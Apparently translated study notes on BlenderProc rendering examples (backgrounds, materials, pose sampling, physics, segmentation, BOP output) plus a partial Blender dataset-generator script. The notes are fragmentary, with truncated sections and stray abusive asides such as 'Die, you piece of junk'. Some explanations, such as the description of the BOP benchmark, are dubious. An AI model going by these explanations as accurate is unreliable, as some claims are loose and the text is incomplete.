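# Hypothetical replacement for the failing glob.glob call
hdri_files = [str(p) for p in Path(args.hdri_path).rglob("*.hdr")]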

      png

      Visualization

blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5

      png

      Code

# load the objects into the scene
obj = bproc.loader.load_blend(args.model)[0]

haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
bproc.world.set_world_background_hdr_img(haven_hdri_path)
1. bproc.loader.load_blend(args.model) loads the Blender model file specified by args.model. The function returns a list of objects, and we store the first one in the variable obj.
2. …

        Code


# Add dust to all materials of the loaded object
for material in obj.get_materials():
    bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)

This code adds a dust effect to every material of the model object loaded into Blender.

Specifically, it performs the following steps:


      Object selection and manipulation using displacement modifier

This example demonstrates manipulating entities by adding displacement modifiers with different textures, as part of the EntityManipulator module.

      Usage

blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output

      Visualization

blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5

      png

      Code

# Add displacement to all objects
for obj in objs:
    # Create a uv mapping based on a cylinder projection
    obj.add_uv_mapping("cylinder")

    # Create a random procedural texture
    texture = bproc.material.create_procedural_texture('CLOUDS')
    # Displace the vertices of the object based on that random texture
    obj.add_displace_modifier(
        texture=texture,
        strength=random.gauss(0, 0.5),
        subdiv_level=random.randint(1, 3),
    )

If an object has no UV mapping, we add one, since it is necessary for mapping the displacement texture onto the object. For the UV mapping we use a projection; the projection types Blender offers are "cube", "cylinder", "smart" and "sphere".

Then we add a displacement modifier with a random texture to each entity.
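A minimal sketch of picking one of the other projection types listed above:

# Any of the projection types listed above should work here
obj.add_uv_mapping("sphere")  # alternatives: "cube", "cylinder", "smart"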

Lens distortion

        Usage

        Standard Scene:

blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output

        png

        simple calibration image by loading intrinsics and extrinsics from a file:

blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output

        png

        fairly distorted image:

blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output

        png

• Load the objects; position them at the origin of the world reference frame.
• …

        Material Randomization

        Usage

blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
        • examples/advanced/material_randomizer/main.py: path to the main python file to run.
        • examples/resources/scene.obj: path to the object file with the basic scene.
• …

Visualization

          png

          png

          Code

# Collect all materials
materials = bproc.material.collect_all()

# Go through all objects
for obj in objs:
    # For each material of the object
    for i in range(len(obj.get_materials())):
        # In 50% of all cases
        if np.random.uniform(0, 1) <= 0.5:
            # Replace the material with a random one
            obj.set_material(i, random.choice(materials))

This code operates on all objects loaded into Blender and randomly replaces their materials.

Specifically, it performs the following steps:


          Motion Blur and Rolling Shutter

In this example we show how to generate motion blur and rolling-shutter effects.

These effects become visible if the camera or an object moves between frames. With the object static, the camera goes through the following motion:

0 -10 4 1.3 0 0 # initial position
0 -15 4 1.3 0 0 # moving away from object
5 -15 4 1.3 0 0 # moving to the right
5 -15 8 1.3 0 0 # moving upwards
1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

          Usage

blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output

It won't run. Die, you piece of junk.

          Object pose sampling

This example focuses on object.ObjectPoseSampler, which allows object pose sampling with collision checks inside a sampling volume.

          Usage

blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
          • examples/advanced/object_pose_sampling/main.py: path to the main python file to run.
          • examples/resources/camera_positions: text file with parameters of camera positions.
• …

          • examples/advanced/object_pose_sampling/output: path to the output directory.

          Visualization

blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5

          png

          Code

# Define a function that samples the pose of a given object
def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

# Sample the poses of all objects, while making sure that no objects collide with each other.
bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs
)

We define a function that samples and sets an object's location and rotation. The object is placed at the sampled pose, and collision checks are run against all objects specified by objects_to_check_collisions (all objects by default). If a collision occurs, the position is reset and a new pose is sampled. The maximum number of attempts can be set with max_tries.
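A sketch of capping the retries (the parameter is named in the text above; the value here is illustrative):

bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs,
    max_tries=1000  # illustrative value
)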

          On surface object pose Sampling

This example focuses on the OnSurfaceSampler, which allows pose sampling for selected objects on a chosen surface.

          Usage

blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
          • examples/advanced/on_surface_object_sampling/main.py: path to the main python file to run.
          • examples/resources/camera_positions: text file with parameters of camera positions.
• …

          • examples/advanced/on_surface_object_sampling/output: path to the output directory.

          Visualization

blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5

          png

          png

          Code

# Define a function that samples the pose of a given object
def sample_pose(obj: bproc.types.MeshObject):
    # Sample the spheres location above the surface
    obj.set_location(bproc.sampler.upper_region(
        objects_to_sample_on=[surface],
        min_height=1,
        max_height=4,
        use_ray_trace_check=False
    ))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

This code defines a sample_pose function and uses it to sample poses for model objects already loaded into Blender.

Once defined, the function can be used to sample positions and orientations for the loaded objects, adding variety and realism to the renders, especially when an object needs to be placed above a surface.

In short, it provides a simple way to sample object poses that can be extended into more complex sampling logic, giving the renderer richer and more realistic scenes.

# Sample the spheres on the surface
spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)

Set up the rigid bodies:

# Enable physics for spheres (active) and the surface (passive)
for sphere in spheres:
    sphere.enable_rigidbody(True)
surface.enable_rigidbody(False)

Run the physics simulation:

# Run the physics simulation
bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)

          Optical Flow

This example shows how to obtain forward/backward optical flow values between consecutive key frames.

Flow becomes visible when the camera or objects move between frames. Here, the camera goes through the following motion:

0 -10 4 1.3 0 0 # initial position
0 -12 4 1.3 0 0 # moving away from object
2 -12 4 1.3 0 0 # moving to the right
2 -12 6 1.3 0 0 # moving upwards
1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

          Usage

blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
          • examples/advanced/optical_flow/main.py: path to the main python file to run.
          • examples/advanced/optical_flow/camera_positions: text file with parameters of camera positions.
• examples/resources/scene.obj: path to the object file containing the scene.
          • examples/advanced/optical_flow/output: path to the output directory.

Visualization

blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5

          png

          Code

# Render the optical flow (forward and backward) for all frames
data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
• Iterates over all camera poses and renders forward and/or backward optical flow.
• Renders the images in .exr format, which allows a linear color space and higher precision, then converts them to numpy.float32 arrays.
Random Backgrounds

            jpg

In this example we generate renders of an object (Suzanne) and paste them onto random background images, while randomizing the object's position, orientation, material properties, and lighting. This is a simple way to generate training data for classification, object detection, and segmentation tasks. It is easy to implement and use, but usually gives worse results than rendering objects inside an actual 3D scene.

            Usage

blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
            • examples/advanced/random_backgrounds/main.py: path to the main python file to run.
            • examples/advanced/random_backgrounds/object.ply: path to the object file.
• examples/advanced/random_backgrounds/output: path to the output directory.

So essentially: render an image without a background, then swap in some other background.

Then run:

python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite

to paste the backgrounds in.

            Code

# Enable transparency so the background becomes transparent
bproc.renderer.set_output_format(enable_transparency=True)

This enables transparency in the renderer's output, so the background of the rendered images becomes transparent.

Random Room Constructor

Both of these (the cctextures and the IKEA dataset) must be downloaded to run this example.

They're also a pain to download, so: give up!

            Code

# Load materials and objects that can be placed into the room
materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
interior_objects = []
for i in range(15):
    interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))

The cctextures were downloaded via a script; here only assets whose name contains one of the listed names are used. This keeps things realistic, since materials like "Asphalt" are not usually found indoors. In addition, 15 objects are loaded from the specified IKEA dataset categories.

# Construct random room and fill with interior_objects
objects = bproc.constructor.construct_random_room(used_floor_area=25,
                                                  interior_objects=interior_objects,
                                                  materials=materials, amount_of_extrusions=5)

construct_random_room builds a random floor plane with matching walls and ceiling. It places the loaded IKEA objects at random positions and assigns the cc-texture materials. The room has a floor area of 25 square meters and at most 5 extrusions. An extrusion is a corridor-like protrusion from the central base rectangle; extrusions can be wider or narrower, but never smaller than the minimum corridor_width. The module automatically distributes the 25 square meters over all extrusions.
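For instance, widening those corridors might look like the sketch below (corridor_width=1.2 is an assumed value, and passing it as a keyword here is an assumption about the function's signature):

# As above, but with a wider minimum corridor (assumed keyword argument)
objects = bproc.constructor.construct_random_room(used_floor_area=25,
                                                  interior_objects=interior_objects,
                                                  materials=materials,
                                                  amount_of_extrusions=5,
                                                  corridor_width=1.2)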

# Bring light into the room
bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)

This makes the ceiling emit light and removes any material assigned to it.

Blender-BlenderProc Examples overview-Basic Examples

Basic example

Usage

The example code is in examples/basics/basic/main.py. In a shell, run:

blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output

and off it goes! Or rather, it throws an error first:

It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
Gonna try to download it automatically.
Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
Error while fetching file: <urlopen error timed out>.
Error while fetching file: The read operation timed out.
Error while fetching file: <urlopen error timed out>.
Error while fetching file: <urlopen error timed out>.

I set up a global proxy with TUN mode and re-ran it a few times, and it eventually worked orz

png

Judging by this, downloading freeimage-3.15.1-win64.dll yourself and dropping it into C:\Users\XXXX\AppData\Local\imageio\freeimage\ should work too!

File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.

Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
Selecting render devices...
Device NVIDIA GeForce RTX 4060 Laptop GPU of type OPTIX found and used.
Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
Timer 'OBJ_import' took 1.5ms
Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

...

Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
Time: 00:01.36 (Saving: 00:00.30)

Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

...

Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
Time: 00:00.86 (Saving: 00:00.01)

Merging data for frame 0 into examples/basics/basic/output\0.hdf5
Merging data for frame 1 into examples/basics/basic/output\1.hdf5

Blender quit
Cleaning temporary directory

Visualization

blenderproc vis hdf5 examples/basics/basic/output/0.hdf5

This renders three images: colors, depth, and normals:

png

Code


import blenderproc as bproc
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
parser.add_argument('output_dir', help="Path to where the final files will be saved, could be examples/basics/basic/output")
args = parser.parse_args()

Initialize blenderproc:

bproc.init()

Load the scene from args.scene:

objs = bproc.loader.load_obj(args.scene)

Create a light:

# define a light and set its location and energy level
light = bproc.types.Light()
light.set_type("POINT")
light.set_location([5, -5, 5])
light.set_energy(1000)

Set up the camera: this code sets the camera resolution, then reads the camera positions and converts them into homogeneous camera-to-world transformation matrices.

# define the camera resolution
# bproc.camera.set_resolution() takes the image width and height; here we use 512x512.
bproc.camera.set_resolution(512, 512)

# read the camera positions file and convert into homogeneous camera-world transformation
with open(args.camera, "r") as f:
    for line in f.readlines():
        # Read the file line by line, turn each pose into a homogeneous transformation
        # matrix, and register it via bproc.camera.add_camera_pose().
        line = [float(x) for x in line.split()]
        position, euler_rotation = line[:3], line[3:6]
        matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
        bproc.camera.add_camera_pose(matrix_world)

Render the images:

# activate normal and depth rendering
bproc.renderer.enable_normals_output()
bproc.renderer.enable_depth_output(activate_antialiasing=False)
# bproc.renderer.set_noise_threshold(0.01) # this is the default value

# render the whole pipeline
data = bproc.renderer.render()

First we enable blenderproc to produce normals and distance for each color image. We also set the desired noise threshold: a lower threshold means less noise in the image but longer render times. The default of 0.01 is suitable for most applications.
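For instance, to trade render time for a cleaner image, the commented-out call above can be used with a lower value:

# Halve the default noise threshold: less noise, longer render
bproc.renderer.set_noise_threshold(0.005)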

=> This creates the files rgb_0000.png and rgb_0001.png in the temporary folder, along with the corresponding normal and depth images.

Finally, calling light.set_energy(500) would set the light's energy to 500 W, controlling the brightness.

# render the whole pipeline
data = bproc.renderer.render()

# Collect states of all objects
object_states = []
for obj in objs:
    object_states.append({
        "name": obj.get_name(),
        "local2world": obj.get_local2world_mat()
    })
# Add states (they are the same for all frames here)
data["object_states"] = [object_states] * bproc.utility.num_frames()

# Collect state of the one light
light_state = {
    "name": light.get_name(),
    "local2world": light.get_local2world_mat(),
    "energy": light.get_energy()
}
# Add states (it's the same for all frames here)
data["light_states"] = [light_state] * bproc.utility.num_frames()

# Collect state of the camera at all frames
cam_states = []
for frame in range(bproc.utility.num_frames()):
    cam_states.append({
        "cam2world": bproc.camera.get_camera_pose(frame),
        "cam_K": bproc.camera.get_intrinsics_as_K_matrix()
    })
# Add states to the data dict
data["cam_states"] = cam_states

This code first renders the current scene via bproc.renderer.render() and stores the result in data; the object, light, and camera states are then collected and added to that same data dict.
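In BlenderProc's standard workflow the data dict is then written into .hdf5 containers, which is what produces the 0.hdf5 and 1.hdf5 files seen in the log above:

# Write all frames (renders plus the collected states) into .hdf5 containers
bproc.writer.write_hdf5(args.output_dir, data)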


Object selection and manipulation

Usage

blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output

Visualization

blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5

png

Code

# load the objects into the scene
objs = bproc.loader.load_obj(args.scene)

# Find object with name Suzanne
suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
# Set its location and rotation
suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
suzanne.set_rotation_euler([1, 1, 0])

This example focuses on BlenderProc's filtering operations and on setting an object's rotation and location.

In this filter operation the condition is "name": 'Suzanne', i.e. we select all objects satisfying obj.name == 'Suzanne'; here exactly one object matches. To select several elements at once, use bproc.filter.by_attr() instead.
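For example, a multi-object selection with a regular expression might look like this sketch (the "Cube.*" pattern and the regex flag are illustrative assumptions):

# Select every loaded object whose name starts with "Cube" (hypothetical names)
cubes = bproc.filter.by_attr(objs, "name", "Cube.*", regex=True)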


Material selection and manipulation

Usage

blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output

Visualization

blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5

png

# Find all materials
materials = bproc.material.collect_all()

# Find the material of the ground object
ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
# Set its displacement based on its base color texture
ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)

This code looks up the ground object's material and derives its displacement from the Base Color texture, modifying the material's properties to get a more interesting render.

# Collect all jpg images in the specified directory
images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
for mat in materials:
    # Load one random image
    image = bpy.data.images.load(filepath=str(random.choice(images)))
    # Set it as base color of the current material
    mat.set_principled_shader_value("Base Color", image)

This code collects all .jpg textures matching the pattern in the given directory and assigns a random one as the Base Color of every material.

Physics positioning

Usage

blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output

Visualization

blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5

png

Code

# Define a function that samples the pose of a given sphere
def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
    obj.set_rotation_euler(bproc.sampler.uniformSO3())

# Sample the poses of all spheres above the ground without any collisions in-between
bproc.object.sample_poses(
    spheres,
    sample_pose_func=sample_pose
)

First we define a function that sets a given object to a new pose. This function is then used inside the bproc.object.sample_poses call: it is invoked for each object, after which a collision check against the other objects is performed. The process repeats until every object has been placed without collisions.

The goal is to simulate the objects' dynamic motion, adding physical realism to the render.

# Make all spheres actively participate in the simulation
# enable_rigidbody(active=True) makes each sphere an active body, i.e. forces and
# collisions act on it during the simulation.
for obj in spheres:
    obj.enable_rigidbody(active=True)
# The ground should only act as an obstacle and is therefore marked passive.
# To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
ground.enable_rigidbody(active=False, collision_shape="MESH")

# Run the simulation and fix the poses of the spheres at the end
# min_simulation_time and max_simulation_time bound the simulated time in seconds, and
# check_object_interval is the interval (in seconds) at which object poses are checked.
# Here the simulation runs between 4 s and 20 s, checking once per second. (Note: the
# call has no effect if physics was not enabled on the objects.)
bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)

This code does the following:

  1. All sphere objects are made active by enabling their rigidbody property. For the ground, active is set to False, meaning it is passive in the scene but still interacts with active objects. We also give the ground a MESH collision shape instead of the default CONVEX_HULL. Note that mesh collision shapes can cause performance problems and errors in more complex use cases; if that happens, try physics_convex_decomposition instead.

The purpose is to simulate the physical interaction and motion between objects, making the render more realistic.

    Semantic Segmentation

    Usage

blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output

    Visualization

blenderproc vis hdf5 examples/basics/semantic_segmentation/output\1.hdf5

    png

    Code

# load the objects into the scene
objs = bproc.loader.load_blend(args.scene)

This snippet loads the .blend file, extracting only the mesh objects rather than everything stored in the file.
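If only certain object types are wanted, the loader can filter them; a sketch (the obj_types keyword and its values are an assumption about load_blend's signature):

# Load only mesh objects from the .blend file (assumed keyword argument)
objs = bproc.loader.load_blend(args.scene, obj_types=["mesh"])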

Note that in the loaded .blend file every object already carries a custom property named "category_id". This can also be set manually:

obj.set_cp("category_id", 0)

# enable segmentation masks (per class and per instance)
bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

This module can map any kind of object-related information either into the image or into a list of object indices for the scene. For example, to map the custom property category_id onto the image, set map_by=["category_id"]; each pixel is then assigned the category_id of the object visible at that pixel. If set to instance, each pixel receives the id of an object in the scene; these ids are consistent across frames, which also means not every id has to appear in every image.

It can also be set to other custom properties or attributes of the object class, such as "name", which returns each object's name. Names cannot be stored in an image, so an additional dictionary is generated and attached to the final .hdf5 container, mapping each instance number to a name. Whenever there are keys that cannot be stored in an image, an instance image must be generated as well, otherwise an error is raised.
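To see what this produces, the container can be inspected with h5py; a sketch, where the dataset key "category_id_segmaps" is an assumption based on BlenderProc's default naming:

import h5py

# Open the first container and list the stored datasets (assumed key names)
with h5py.File("examples/basics/semantic_segmentation/output/0.hdf5", "r") as f:
    print(list(f.keys()))                 # e.g. colors, category_id_segmaps, ...
    segmap = f["category_id_segmaps"][:]  # per-pixel category ids
    print(segmap.shape, segmap.dtype)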


    Camera Object Pose Setting

    Usage

blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output

ply
format ascii 1.0
element vertex 59070
property float x
property float y
property float z
property float nx
property float ny
property float nz
property uchar red
property uchar green
property uchar blue
property uchar alpha
element face 118136
property list uchar int vertex_indices
end_header
-74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
-74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
-74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

...

3 276 277 275
3 279 278 249
3 279 249 252

...

This ply file contains the data of a triangle mesh; each line describes either a vertex or a triangular face. The parts of the file are:

The first line declares the PLY file format being used.
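As a small aside, the header is plain text and easy to parse; a minimal sketch in pure Python:

# Read an ASCII PLY header and report the declared element counts
def read_ply_counts(path):
    counts = {}
    with open(path, "r") as f:
        for line in f:
            tokens = line.split()
            if tokens and tokens[0] == "element":
                counts[tokens[1]] = int(tokens[2])
            elif tokens and tokens[0] == "end_header":
                break
    return counts

# For the file above this prints {'vertex': 59070, 'face': 118136}
print(read_ply_counts("examples/basics/camera_object_pose/obj_000004.ply"))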


    png

Output in BOP dataset format

    Code

# Use vertex color for texturing
for mat in obj.get_materials():
    mat.map_vertex_color()
# Set pose of object via local-to-world transformation matrix
obj.set_local2world_mat(
    [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
     [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
     [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
     [0, 0, 0, 1.0]]
)
# Scale 3D model from mm to m
obj.set_scale([0.001, 0.001, 0.001])
# Set category id which will be used in the BopWriter
obj.set_cp("category_id", 1)

This preprocesses the loaded model for the rest of the pipeline: switching the materials to vertex colors avoids texture lookups and keeps the scene simple to render; scaling the model from millimetres to metres makes scene dimensions and object distances easier to control; and the custom category_id property adds class information so the segmentation renderer can tell objects apart.

# Set intrinsics via K matrix
# K encodes the camera's internal optics: the focal lengths and the principal point.
# The function takes K together with the final image width and height.
bproc.camera.set_intrinsics_from_K_matrix(
    [[537.4799, 0.0, 318.8965],
     [0.0, 536.1447, 238.3781],
     [0.0, 0.0, 1.0]], 640, 480
)
# Set camera pose via cam-to-world transformation matrix
# cam2world describes the camera frame relative to the world frame; in practice such
# a matrix often comes from external sensors (IMU, GPS, ...).
cam2world = np.array([
    [1, 0, 0, 0],
    [0, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 0, 0, 1]
])
# Change coordinate frame of transformation matrix from OpenCV to Blender coordinates
# The pose is given in OpenCV conventions and must be converted to Blender's frame.
cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
bproc.camera.add_camera_pose(cam2world)

This code configures the camera's internal optics and its pose. With the intrinsics and the pose set, the camera's position and orientation in the scene and the projection onto the image can be simulated precisely, which makes renders more faithful and improves the accuracy of downstream vision algorithms.
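For intuition, with the axes ["X", "-Y", "-Z"] the call above amounts to flipping the Y and Z axes of the camera frame, i.e. right-multiplying by a diagonal sign matrix; a sketch (this equivalence is my reading of the axis specification, not something stated in the example):

import numpy as np

# Hand-rolled version of the OpenCV -> Blender frame change used above
flip_yz = np.diag([1.0, -1.0, -1.0, 1.0])
cam2world_blender = cam2world @ flip_yz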

  3. The camera source frame is changed to match Blender's frame (this converts from the OpenCV coordinate system to Blender's).
  4. Finally, the new camera matrix is added as a pose, and the scene can be rendered.
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)

The BOP dataset is a public benchmark for object pose estimation in industrial scenes. It contains 80 challenging industrial parts with varying materials, deformations, surface textures, and reflectivity; each part was captured in hundreds of images with realistic noisy depth and RGB data. Exact models (CAD files) are also provided for every part, so methods can be compared against the CAD geometry. BOP's main purpose is to provide a standardized benchmark for evaluating object pose estimation algorithms in industrial scenes.

Blender-Datasets-auto-generator-based-on-Blender

Resources

Code

    Config

import bpy
import math, mathutils
import os, random
import json
import numpy as np

mode = 'train' # FLAGS : train or val
worldPath = 'pathToYourBackgrounds/'
objsPath = 'pathToYour3DObjso/'
imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

picsNum = 2000
# Number of objects in a scene
objsNum = 4
if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
cameraLens = 15 # camera focal length (mm)
img_w = 960
img_h = 540
# Worlds changing frequency
freq_CTW = 10
objNameList = []

    main()

1. clearAll(): removes every object from the scene.

The labelIt(i) call is the part still left to implement: the annotation code that labels the generated renders.

def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene               # get the current scene
    scene.camera = scene.objects['Camera']  # use the loaded camera as the scene camera
    scene.render.resolution_x = img_w       # output image width
    scene.render.resolution_y = img_h       # output image height
    K = calibCamera()                       # compute the camera intrinsics (K matrix)
    changeTheWorld()                        # change the environment (e.g. lighting) so images differ
    for i in range(picsNum):                # render picsNum images in a loop
        if i % freq_CTW == 0:
            changeTheWorld()
        changeObjs()                        # swap which objects are in the scene
        bougeLe()                           # randomly move the objects (simulating real motion)
        snapIt(scene, i)                    # render the scene to an image
        labelIt(i)                          # <- TODO
        calId = f'{kittiCalibsPath}{i}.txt' # write out the calibration parameters
        with open(calId, 'w', encoding='utf-8') as fc:
            for p in K:
                fc.writelines(p)
    #clearAll()

if __name__ == '__main__':
    main()

    clearAll()

Delete all objects from the scene:

def clearAll():
    for obj in bpy.data.objects:
        bpy.data.objects.remove(obj)
    for img in bpy.data.images:
        bpy.data.images.remove(img)
    for ma in bpy.data.materials:
        bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
        bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
        bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
        bpy.data.cameras.remove(cd)

    loadWorlds()

The worlds are a set of *.hdr files stored in worldPath; load them:

def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
        bpy.data.images.load(worldPath + file)
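Note that the script creates the Environment Texture node (enode) but never links it into the world's shader; for the HDR to actually light the scene, a link to the Background node is needed. A sketch of that hookup (my addition, not part of the original script; it would go at the end of loadWorlds(), where enode is in scope):

# Connect the environment texture to the world's Background shader
node_tree = bpy.context.scene.world.node_tree
background = node_tree.nodes['Background']
node_tree.links.new(enode.outputs['Color'], background.inputs['Color'])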

    loadObjs()

The objects are a set of *.blend files stored in objsPath; load them:

def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
        file_path = os.path.join(objsPath, objName)
        objN = objName.split('.')[0]  # object name without the file extension
        objNameList.append(objN)      # record it in the global name list
        # Load the .blend file and append the objects it contains to the current scene
        with bpy.data.libraries.load(file_path, link=False) as (data_from, data_to):
            # Only append objects whose name starts with the current object name,
            # so unrelated objects are not pulled into the scene
            data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
